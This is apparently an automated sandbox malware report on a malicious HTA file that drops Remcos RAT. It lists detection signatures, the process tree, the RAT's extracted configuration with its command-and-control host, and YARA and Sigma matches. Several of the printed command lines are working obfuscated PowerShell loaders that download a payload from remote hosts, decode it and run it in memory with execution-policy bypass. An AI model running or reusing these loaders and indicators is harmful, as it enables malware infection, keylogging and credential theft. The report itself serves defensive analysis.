
Windows Analysis Report
seethebestthignswhichgivingbestopportunities.hta

Overview

General Information

Sample name: seethebestthignswhichgivingbestopportunities.hta
Analysis ID: 1559566
MD5: 35b8d63ead2eb58b7ed815be7bcbf97f
SHA1: 88ae189165c612cc11e3a83ce322363698e21daf
SHA256: 886699a7b1f864a18f767b1f3c95d860bced175c6e9bf2a5186119b698b5de23
Tags: hta, user-abuse_ch

Detection: Cobalt Strike, Remcos, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 2816 cmdline: mshta.exe "C:\Users\user\Desktop\seethebestthignswhichgivingbestopportunities.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 7404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 7552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • CasPol.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Malware configuration (Remcos):
{
  "Host:Port:Password": ["banaya.duckdns.org:6946:1"],
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-VCYBO3",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "1",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5",
  "Audio folder": "MicRecords",
  "Connect delay": "0",
  "Copy folder": "Remcos",
  "Keylog folder": "remcos"
}
Source: seethebestthignswhichgivingbestopportunities.hta | Rule: JoeSecurity_HtmlPhish_44 | Description: Yara detected HtmlPhish_44 | Author: Joe Security
Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source: 16.2.powershell.exe.93565d0.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 16.2.powershell.exe.93565d0.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 16.2.powershell.exe.93565d0.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 16.2.powershell.exe.93565d0.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
Source: 16.2.powershell.exe.93565d0.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]
Source: amsi32_7724.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Thomas Patzke | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'[base64 payload omitted]'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", ProcessId: 7552, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", CommandLine: (identical to Command above; truncated in the report)
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine|base64offset|contains: L, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, ProcessId: 4220, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS", ProcessId: 7552, ProcessName: wscript.exe
                    Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; 